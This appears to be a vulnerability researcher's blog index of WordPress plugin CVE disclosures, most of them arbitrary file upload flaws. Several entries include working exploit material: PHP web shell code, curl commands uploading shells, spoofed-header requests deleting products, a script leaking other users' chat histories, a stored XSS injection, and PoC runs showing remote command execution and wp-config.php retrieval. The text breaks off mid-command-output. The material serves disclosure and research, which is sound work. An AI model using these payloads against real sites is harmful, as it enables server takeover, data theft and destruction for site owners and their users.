Posts on

MDJM Event Management <= 1.7.8.3 - Authenticated (Administrator+) Arbitrary File Upload via mdjm_email_upload_file Parameter

Fri, 05 Jun 2026 00:01:00 +0000

CVE-2026-7537

The WordPress MDJM Event Management plugin (version 1.7.8.3 and prior) contains an arbitrary file upload vulnerability that allows authenticated administrators to upload malicious PHP files to the server, potentially leading to remote code execution.

TL;DR Exploits

A POC CVE-2026-7537.py is provided to demonstrate an authenticated attacker uploading shell.php and executing remote code:

python3 ./CVE-2026-7537.py http://target-site.com admin password123
[+] Logging into: http://target-site.com/wp-admin
[+] Extracting nonce values...
[+] Uploading web shell: shell.php
[+] Web Shell Location: http://target-site.com/wp-content/uploads/2026/02/shell.php
[+]
[+] Executing test command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Technical Description

The vulnerability exists in the mdjm_send_comm_email() function in the communications feature. The upload functionality lacks proper file validation while processing file attachments for email communications. This allows authenticated users with the mdjm_comms_send capability (administrators and MDJM admins by default) to upload arbitrary files, including PHP files that can be executed on the server.

Kalrav AI Agent <= 2.3.3 - Unauthenticated Arbitrary File Upload via kalrav_upload_file AJAX Action

Fri, 23 Jan 2026 00:01:00 +0000

CVE-2025-13374

The WordPress Kalrav AI Agent plugin (version 2.3.3 and prior) contains an arbitrary file upload vulnerability that allows unauthenticated users to upload malicious PHP files to the server, potentially leading to remote code execution.

TL;DR Exploits

A POC CVE-2025-13374.py is provided to demonstrate a remote attacker uploading shell.php and executing remote code:

python3 ./CVE-2025-13374.py http://techcorp.cc
[+] Target: http://techcorp.cc
[+] File uploaded successfully!
[+] Shell URL: http://techcorp.cc/wp-content/plugins/kalrav-ai-agent/uploads/1763247725-shell.php
[+] Command output:
www-data

Technical Description

The vulnerability exists in the kalrav_upload_file() function at the /wp-admin/admin-ajax.php endpoint. The upload functionality lacks proper file validation, nonce verification, and capability checks. This allows unauthenticated users to upload arbitrary files, including PHP files that can be executed on the server.

Flex QR Code Generator <= 1.2.6 - Unauthenticated Arbitrary File Upload

Fri, 05 Dec 2025 00:01:00 +0000

CVE-2025-12673

The Flex QR Code Generator plugin does not validate user permission or sanitize file uploads in its update_qr_code AJAX endpoint, allowing unauthenticated attackers to upload arbitrary files including executable PHP scripts, leading to remote code execution.

TL;DR Exploits

# Upload PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
  -F "action=flexqr_update_qr" \
  -F "qrId=1" \
  -F "qrData={\"data\":\"https://example.com\"}" \
  -F "logo=@shell.php"

Details

The vulnerability exists in the update_qr_code method of the FlexQrCodeGenerator class. The plugin registers AJAX endpoints for unauthenticated users, allowing any visitor to upload arbitrary files that get stored in the WordPress uploads directory.

g-FFL Cockpit <= 1.7.1 - Improper Authorization to Unauthenticated Product Deletion

Fri, 05 Dec 2025 00:00:00 +0000

CVE-2025-12720

The g-FFL Cockpit plugin does not implement proper authorization checks on the queue and process REST API endpoints, allowing unauthenticated users to delete arbitrary WooCommerce products by spoofing HTTP headers to bypass IP-based authentication.

TL;DR Exploits

TARGET_SITE="http://example.com"
curl -X POST $TARGET_SITE/wp-json/fflcockpit/v1/queue -H "X-Forwarded-For: 3.212.185.187" -H "Content-Type: application/json" -d '{"action":"delete","products":[{"id":105}]}' && curl -X POST $TARGET_SITE/wp-json/fflcockpit/v1/process -H "X-Forwarded-For: 3.212.185.187" -H "Content-Type: application/json"

Details

The queue and process REST API endpoints use IP-based authentication that can be bypassed by spoofing the X-Forwarded-For or CF-Connecting-IP HTTP headers. The authentication mechanism relies on get_client_ip() which trusts user-controllable headers, and checks against a hardcoded IP address stored in the plugin source code.

g-FFL Cockpit <= 1.7.1 - Missing Authorization to Unauthenticated Information Exposure

Fri, 05 Dec 2025 00:00:00 +0000

CVE-2025-12721

The g-FFL Cockpit plugin does not implement proper authorization checks on the server_status REST API endpoint, allowing unauthenticated users to access sensitive server configuration information, PHP settings, database details, WordPress installation metadata, and active plugin information through an exposed public endpoint.

TL;DR Exploits

TARGET_SITE="http://example.com"
curl -X GET $TARGET_SITE/wp-json/fflcockpit/v1/server_status | jq

Details

The handle_server_status() function in includes/class-sync-endpoint.php retrieves and exposes comprehensive server information without requiring any authentication or capability checks. The endpoint is registered with permission_callback => '__return_true', making it completely accessible to any unauthenticated visitor.

Bread & Butter: Gate content + Capture leads + Collect first-party data + Nurture with Ai agents <= 7.10.1321 - Cross-Site Request Forgery to Arbitrary File Upload

Thu, 04 Dec 2025 00:02:00 +0000

CVE-2025-12189

The Bread & Butter IO plugin contains a vulnerability in its image upload functionality that allows any attacker to trick authenticated administrators into uploading arbitrary files to the server, including PHP web shells, leading to Remote Code Execution (RCE). The vulnerability stems from the uploadImage() function lacking CSRF protection, allowing attackers to craft malicious requests that administrators’ browsers will automatically execute.

The vulnerability exists in the uploadImage() function in /bread-butter/src/Base/Ajax.php which lacks proper file validation and CSRF protection, while using file_put_contents() to write files directly to the WordPress uploads directory before any security checks.

WP Directory Kit <= 1.4.4 - Authentication Bypass to Privilege Escalation via Account Takeover

Tue, 02 Dec 2025 00:02:00 +0000

CVE-2025-13390

The WP Directory Kit plugin for Wordpress version 1.4.4 and below contains an authentication bypass in its auto-login functionality. The vulnerability allows unauthenticated attackers to gain administrative access to WordPress sites by exploiting a cryptographically broken token generation mechanism. The auto-login feature cannot be disabled and uses a predictable token that is derived solely from the MD5 hash of the user ID.

TL;DR Exploits

The CVE-2025-13390.sh file uploads a web shell plugin to a target site assuming user ID 1 is an administrator.

MxChat – AI Chatbot for WordPress <= 2.5.5 - Unauthenticated Information Exposure

Tue, 02 Dec 2025 00:01:00 +0000

CVE-2025-12585

The MxChat Basic plugin does not verify session ownership in the mxchat_fetch_conversation_history AJAX endpoint, allowing unauthenticated users to access other users’ conversation history and IP addresses through Insecure Direct Object Reference (IDOR) vulnerabilities.

TL;DR Exploits

TARGET_SITE="http://example.com"
SESSION_ID="mxchat_chat_7jxi3jsdb"
NONCE=$(curl -s $TARGET_SITE | grep -oP 'nonce["\047]:\s*["\047]\K[^"\047]+' | head -1)
curl -X POST $TARGET_SITE/wp-admin/admin-ajax.php \
  -d "action=mxchat_fetch_conversation_history" \
  -d "session_id=$SESSION_ID" \
  -d "nonce=$NONCE" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "X-Requested-With: XMLHttpRequest" | jq

Details

The mxchat_fetch_conversation_history() function in /includes/class-mxchat-integrator.php file retrieves conversation data based solely on a client-provided session_id without verifying that the requester owns the session. This allows any unauthenticated user with a valid nonce (available via frontend JavaScript) to access other users’ private conversation data. Additionally, the conversation history includes user IP addresses stored in the agent_name field, which are disclosed alongside the conversation data.

AI Feeds <= 1.0.11 - Unauthenticated Arbitrary File Upload

Tue, 25 Nov 2025 00:01:00 +0000

CVE-2025-13597

The AI Feeds WordPress plugin versions 1.0.11 and below contain an unauthenticated remote code execution vulnerability in the actualizador_git.php file. This file is directly accessible via HTTP without any authentication or authorization checks, allowing unauthenticated attackers to download arbitrary GitHub repositories and overwrite plugin files, leading to remote code execution.

TL;DR Exploits

A exploit.py is provided to demonstrate a remote attacker uploading shell.php and executing remote code:

python3 CVE-2025-13597.py -t http://techcorp.cc -o d0n601 -r minimal-rce -k github_pat_YOURKEY -c whoami
[*] Exploiting actualizador_git.php vulnerability...
[*] Downloading and installing shell from GitHub repository: d0n601/minimal-rce
Descargando d0n601/minimal-rce@main ...
Eliminando entradas extra...
Copiando archivos...
OK. Mirror aplicado en: /var/www/html/wp-content/plugins/ai-feeds

[*] Exploit executed. Checking if shell.php was created...

[*] Testing shell access...
www-data


[*] Shell should be accessible at:
    http://techcorp.cc/wp-content/plugins/ai-feeds/shell.php?cmd=COMMAND

Technical Analysis

The vulnerability exists in /wp-content/plugins/ai-feeds/actualizador_git.php. This file implements a GitHub repository mirroring system that can be accessed directly via HTTP without any security controls.

CIBELES AI <= 1.10.8 - Unauthenticated Arbitrary File Upload

Tue, 25 Nov 2025 00:00:00 +0000

CVE-2025-13595

Summary

The Cibeles AI WordPress plugin versions 1.10.8 and below contain an unauthenticated remote code execution vulnerability in the actualizador_git.php file. This file is directly accessible via HTTP without any authentication or authorization checks, allowing unauthenticated attackers to download arbitrary GitHub repositories and overwrite plugin files, leading to remote code execution.

TL;DR Exploits

A CVE-2025-13595.py is provided to demonstrate a remote attacker uploading shell.php and executing remote code:

python3 CVE-2025-13595.py -t http://techcorp.cc -o d0n601 -r minimal-rce -k github_pat_YOURKEY -c whoami
[*] Exploiting actualizador_git.php vulnerability...
[*] Downloading and installing shell from GitHub repository: d0n601/minimal-rce
Descargando d0n601/minimal-rce@main ...
Eliminando entradas extra...
Copiando archivos...
OK. Mirror aplicado en: /var/www/html/wp-content/plugins/cibeles-ai

[*] Exploit executed. Checking if shell.php was created...

[*] Testing shell access...
www-data


[*] Shell should be accessible at:
    http://techcorp.cc/wp-content/plugins/cibeles-ai/shell.php?cmd=COMMAND

Technical Analysis

The vulnerability exists in /wp-content/plugins/cibeles-ai/actualizador_git.php. This file implements a GitHub repository mirroring system that can be accessed directly via HTTP without any security controls.

AI Engine for WordPress: ChatGPT, GPT Content Generator <= 1.0.1 - Authenticated (Contributor+) Arbitrary File Read

Mon, 24 Nov 2025 00:01:00 +0000

CVE-2025-13380

The AI Engine for WordPress plugin contains a vulnerability in its image insertion feature that allows any authenticated user with post editing capabilities (Contributor, Author, Editor, Administrator) to download arbitrary files from the server. The vulnerability stems from the lqdai_update_post AJAX endpoint lacking proper capability checks and the insert_image() function using file_get_contents() with user-controlled URLs without protocol validation, allowing arbitrary file downloads via the file:// protocol.

TL;DR Exploits

A POC CVE-2025-13380.py is provided to demonstrate a Contributor level user downloading the site’s wp-config.php file.

 python3 ./exploit.py http://techcorp.cc contributor password   
[+] Target: http://techcorp.cc
[+] Username: contributor
[+] Nonce obtained: 5dc61a0166
[+] Post created with ID: 148
[+] File written to uploads directory
[+] Attempting to retrieve file from: http://techcorp.cc/wp-content/uploads/2025/11/varwwwhtmlwp-config.php.jpg
[+] File retrieved successfully!
[+] wp-config.php contents:
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
...
...
...

Details

File Insert Function

The lqdai_update_post AJAX action calls the update_post() function on line 315 of /wp-content/plugins/liquid-chatgpt/liquid-chatgpt.php, which lacks proper capability checks and allows any authenticated user to modify posts they can edit:

WPBookit <= 1.0.6 - Unauthenticated Stored Cross-Site Scripting

Thu, 20 Nov 2025 00:02:00 +0000

CVE-2025-12135

The WPBookit plugin does not validate user permission or sanitize custom CSS/JS code in its save_custome_code AJAX endpoint, allowing unauthenticated attackers to inject arbitrary JavaScript that executes on every page load, leading to stored XSS and potential session hijacking.

TL;DR Exploits

# Basic XSS injection
curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "css_code=/* malicious */&js_code=alert('XSS');"

Details

The vulnerability exists in the save_custome_code method of the WPB_Setting_Controller class. The plugin registers AJAX endpoints for unauthenticated users, allowing any visitor to inject arbitrary CSS/JS code that gets executed on every page load.

S2B AI Assistant – ChatBot, ChatGPT, OpenAI, Content & Image Generator <= 1.7.8 - Authenticated (Editor+) Arbitrary File Upload

Thu, 20 Nov 2025 00:01:00 +0000

CVE-2025-12973

The WordPress S2B AI Assistant plugin (versions 2.47 and prior) contains an arbitrary file upload vulnerability that allows authenticated WordPress users with Editor role or higher to upload malicious PHP files to the server, potentially leading to remote code execution.

TL;DR Exploits

A POC CVE-2025-12973.py is provided to demonstrate a remote attacker uploading shell.php and executing remote code:

python3 ./CVE-2025-12973.py http://techcorp.cc editor $PASSWORD
[+] Target: http://techcorp.cc
[+] Username: editor
[+] Nonce obtained: a15be47119
[+] File uploaded successfully!
[+] Shell URL: http://techcorp.cc/wp-content/uploads/2025/11/shell.php
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Technical Description

The vulnerability exists in the Utils.php file at the storeFile() method, which is called by the /wp-admin/admin-post.php endpoint with action s2b_store_chatbot_upload. The upload functionality uses a custom file extension whitelist that explicitly allows dangerous file types including PHP files. This allows authenticated WordPress users with Editor role or higher to upload arbitrary files, including PHP files that can be executed on the server.

Alex Reservations: Smart Restaurant Booking <= 2.2.3 - Authenticated (Admin+) Arbitrary File Upload

Fri, 07 Nov 2025 00:01:00 +0000

CVE-2025-12399

The WordPress Alex Reservations plugin (versions 2.2.3 and prior) contains an arbitrary file upload vulnerability that allows authenticated WordPress administrators to upload malicious PHP files to the server, potentially leading to remote code execution.

TL;DR Exploits

A POC CVE-2025-12399.py is provided to demonstrate a remote attacker uploading shell.php and executing remote code:

python3 ./CVE-2025-12399.py https://TARGETSITE.com admin "$PASSWORD"                                                                                            
[+] Target: http://TARGETSITE.com
[+] Username: admin
[+] Nonce obtained: 022b25d0a5
[+] File uploaded successfully!
[+] Shell URL: https://TARGETSITE.com/wp-content/uploads/alex-reservations/2025/10/shell.php
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Technical Description

The vulnerability exists in the UploadFileController.php file at the /wp-json/srr/v1/app/upload/file endpoint. The upload functionality lacks proper file validation and only performs basic filename sanitization using a regex pattern. This allows authenticated WordPress administrators to upload arbitrary files, including PHP files that can be executed on the server.

StoreEngine – Powerful WordPress eCommerce Plugin for Payments, Memberships, Affiliates, Sales & More <= 1.4.0 - Authenticated (Subscriber+) Arbitrary File Upload

Tue, 16 Sep 2025 00:01:00 +0000

CVE-2025-9216

The StoreEngine plugin contains a vulnerability in it’s CSV Import/Export feature that allows any authenticated user (subscriber, author, editor, etc.) to upload arbitrary files and gain remote code execution. The vulnerability stems from two security flaws: (1) the CSV import endpoint lacks proper file validation checks, permission checks, and only relies on nonce verification for security, and (2) the storeengine_nonce is exposed to ALL frontend users through the plugin’s JavaScript. This combination allows any authenticated user to extract the nonce from frontend pages and use it to upload PHP web shells via the storeengine_csv/import endpoint, effectively granting subscriber+ users the ability to execute arbitrary code on the server.

StoreEngine Powerful WordPress eCommerce Plugin for Payments, Memberships, Affiliates, Sales & More <= 1.4.0 - Authenticated (Subscriber+) Arbitrary File Download

Tue, 16 Sep 2025 00:00:00 +0000

CVE-2025-9215

The StoreEngine plugin contains a vulnerability in its CSV Import/Export feature that allows any authenticated user (subscriber, author, editor, etc.) to download arbitrary files from the server, including sensitive system files, WordPress configuration files, and plugin source code. The vulnerability stems from the storeengine_csv/file_download endpoint lacking proper path sanitization and only relying on nonce verification for security, while the storeengine_nonce is exposed to ALL frontend users through the plugin’s JavaScript. Note: This vulnerability requires the CSV Import/Export addon to be enabled by an administrator. Once enabled, this combination allows any authenticated user to extract the nonce from frontend pages and use it to download any file on the server via path traversal attacks, effectively granting subscriber+ users access to sensitive system and application files.

Make Connector <= 1.5.10 - Authenticated (Admin+) Arbitrary File Upload

Wed, 03 Sep 2025 00:00:12 +0000

CVE-2025-6085

The Make Connector plugin does not sanitize the file types in its REST API media uploads, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.

TL;DR Exploits

cat << 'EOF' > shello.php
<?php    
    // Silence is golden
    if (!empty($_GET['cmd'])) {
        echo "<pre>".shell_exec($_GET["cmd"])."</pre>";
    }
?>
EOF

curl -k -X POST https://lab1.hacker/wp-json/wp/v2/media \
  -H "IWC-API-KEY: YOURFRIENDLYKEYHERE" \
  -F "file=@shello.php" \
  -F "title=Hacker World" \
  -F "description=A test file" \
  -F "caption=Hacker Caption" \

Leveraging the shell once it’s in the uploads folder:

AI Bud – AI Content Generator, AI Chatbot, ChatGPT, Gemini, GPT-4o

Thu, 03 Jul 2025 00:00:00 +0000

CVE-2025-23968

The AI Bud plugin exposes a REST API endpoint /wp-json/ai-buddy/v1/wp/attachments that allows uploading files to the WordPress media library. The endpoint’s file logic contains file renaming functionality that triggers after file type validation, and allows the attacker to rename the uploaded file to any extension (including.php) allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.

TL;DR Exploits

A POC cve-2025-23968.py is provided to demonstrate an administrator uploading a web shell named shell.php.

Download Plugin <= 2.2.8 - Authenticated (Admin+) Arbitrary File Upload via the dpwap_plugin_locInstall Function

Thu, 03 Jul 2025 00:00:00 +0000

CVE-2025-6586

The Download Plugin does not sanitize the file types of the dpwap_plugin_locInstall function exposed via the mul_upload admin page, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.

TL;DR Exploits

A POC cve-2025-6586.py is provided to demonstrate an administrator uploading a web shell named shell.php.

python3 cve-2025-6586.py https://lab1.hacker admin PASSWORD
Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
Uploading web shell: shell.php
Web Shell Location: https://lab1.hacker/wp-
content/uploads/dpwap_logs/files/tmp/shell.php

Executing test command: ip addr
    <pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
        valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
        valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
v       alid_lft 75221sec preferred_lft 75221sec
    inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic
mngtmpaddr noprefixroute
        valid_lft 86354sec preferred_lft 14354sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link
        valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
        valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link
        valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue
state DOWN group default
    link/ether 02:42:77:47:94:a5 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
        valid_lft forever preferred_lft forever
</pre>

Details

The dpwap_plugin_multiple_upload_func function is exposed in the mul_upload admin page. On line 80 of /wp-content/plugins/download-plugin/app/Plugins/Base.php the function includes multiple_upload_plugin.php.

Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Authenticated (Administrator+) Arbitrary File Upload

Wed, 02 Jul 2025 00:00:00 +0000

CVE-2025-5961

The wpvivid-backuprestore plugin does not sanitize the file types of the wpvivid_upload_import_files action, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server. NOTE: Uploaded files are only accessible on WordPress instances running on the NGINX web server as the existing .htaccess within the target file upload folder prevents access on Apache servers.

TL;DR Exploits

A POC CVE-2025-5961.py is provided to demonstrate an administrator uploading a web shell named hack.php.

 python3 ./CVE-2025-5961.py https://lab1.hacker admin password
Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
ajax_nonce: e4d4bec9f0
Uploading web shell: hack.php
{"result":"success"}

Web Shell At: https://lab1.hacker/wp-content/wpvividbackups/ImportandExport/hack.php

Executing test command: ip addr
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
       valid_lft 78309sec preferred_lft 78309sec
    inet6 fd00::a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 86105sec preferred_lft 14105sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:63:2d:a4:f2 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
</pre>

Details

The wpvivid_upload_import_files action calls the upload_files function on line 2210 of /wp-content/plugins/wpvivid-backuprestore/includes/class-wpvivid-export-import.php without enforcing any file type validation.

Ultimate Addons for Contact Form 7 <= 3.5.12 - Authenticated (Administrator+) Arbitrary File Upload via save_options

Tue, 17 Jun 2025 00:00:12 +0000

CVE-2025-6220

The Ultimate Addons for Contact Form 7 plugin does not sanitize the file types in its options save functionality, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.

TL;DR Exploits

A POC CVE-2025-6220.py is provided to demonstrate an administrator uploading a web shell named shell.php.

python3 CVE-2025-6220.py https://lab1.hacker admin PASSWORD

Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
70e7b99966
Uploading web shell: shell.php
{"status":"success","message":"Options saved successfully!"}
Web Shell Location: https://lab1.hacker/wp-content/uploads/itinerary-fonts/shell.php

Executing test command: ip addr
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
       valid_lft 61299sec preferred_lft 61299sec
    inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 86240sec preferred_lft 14240sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:bd:e1:95:26 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
</pre>

Details

The uacf7_options_save functionality in /wp-content/plugins/ultimate-addons-for-contact-form-7/admin/tf-options/classes/UACF7_Settings.php processes file uploads without enforcing proper file type validation.

eMagicOne Store Manager for WooCommerce <= 1.2.5 - Unauthenticated Arbitrary File Upload via set_image Task

Fri, 23 May 2025 05:30:12 +0000

CVE-2025-5058

The eMagicOne Store Manager for WooCommerce plugin exposes a remote management protocol endpoint (?connector=bridge) that allows file uploads to the server. The authentication mechanism relies on a default credential pair (login=1, password=1) and a session key system. If the default credentials are not changed, an attacker can trivially authenticate, obtain a session key, and upload arbitrary files (including PHP shells) to the WordPress root or any writable directory via the set_image task.

eMagicOne Store Manager for WooCommerce <= 1.2.5 - Unauthenticated Arbitrary File Delete

Fri, 23 May 2025 05:20:12 +0000

CVE-2025-4603

The eMagicOne Store Manager for WooCommerce plugin exposes a remote management protocol endpoint (?connector=bridge) that allows file deletion operations on the server. The authentication mechanism relies on a default credential pair (login=1, password=1) and a session key system. If the default credentials are not changed, an attacker can trivially authenticate, obtain a session key, and delete arbitrary files from the WordPress root or any accessible directory.

Reproduction

A POC CVE-2025-4603.py is provided to demonstrate an attacker deleting wp-config.php.

eMagicOne Store Manager for WooCommerce <= 1.2.5 - Unauthenticated Arbitrary File Read

Fri, 23 May 2025 05:10:12 +0000

CVE-2025-4602

The eMagicOne Store Manager for WooCommerce plugin exposes a remote management protocol endpoint (?connector=bridge) that allows file deletion operations on the server. The authentication mechanism relies on a default credential pair (login=1, password=1) and a session key system. If the default credentials are not changed, an attacker can trivially authenticate, obtain a session key, and read arbitrary files from the WordPress root or any accessible directory.

Reproduction

A POC CVE-2025-4602.py is provided to demonstrate reading the wp-config.php file from the server.

eMagicOne Store Manager for WooCommerce <= 1.2.5- Unauthenticated Arbitrary File Upload via set_file Task

Fri, 23 May 2025 05:00:12 +0000

CVE-2025-4336

Reproduction

A POC cve-2025-4336.py is provided to demonstrate a remote attacker uploading a web shell named shell.php via the default authentication mechanism, and executing remote code:

python3 exploit.py https://lab1.hacker   
[*] Requesting session key...
[*] Raw response: {"response_code":20,"revision":11,"module_version":"1.2.5","session_key":"6f46bc8b67b1c8f0dc871bcec9e162c1d43f047e5c46aec7d7fdf48d8c17ed69"}
[+] Got session key: 6f46bc8b67b1c8f0dc871bcec9e162c1d43f047e5c46aec7d7fdf48d8c17ed69
[*] Uploading file...
[*] Upload response: {"response_code":20,"message":"File was successfully uploaded"}
[*] Executing Web Shell Commands...
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
       valid_lft 23576sec preferred_lft 23576sec
    inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 86363sec preferred_lft 14363sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:ef:a9:95:6a brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
</pre>

Vulnerable Flow

Default Credentials and Hash Calculation

On plugin activation, the following constants are set in smconnector.php:

Instantio - Wordpress Plugin <= 3.3.16 - Authenticated (Admin+) Arbitrary File Upload via ins_options_save

Wed, 07 May 2025 05:18:12 +0000

CVE-2025-47550

The Instantio plugin does not sanitize the file types in its options save functionality, allowing administrators or above to upload arbitrary files and potentially gain code execution on the server.

TL;DR Exploits

A POC CVE-2025-47550.py is provided to demonstrate an administrator uploading a web shell named shell.php.

% python3 CVE-2025-47550.py https://lab1.hacker admin PASSWORD
Logging into: https://lab1.hacker/wp-admin
Extracting nonce values...
Uploading web shell: shell.php
{"status":"success","message":"Options saved successfully!"}
Web Shell Location: https://lab1.hacker/wp-content/uploads/itinerary-fonts/shell.php

Executing test command: ip addr
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
       valid_lft 33750sec preferred_lft 33750sec
    inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 86119sec preferred_lft 14119sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
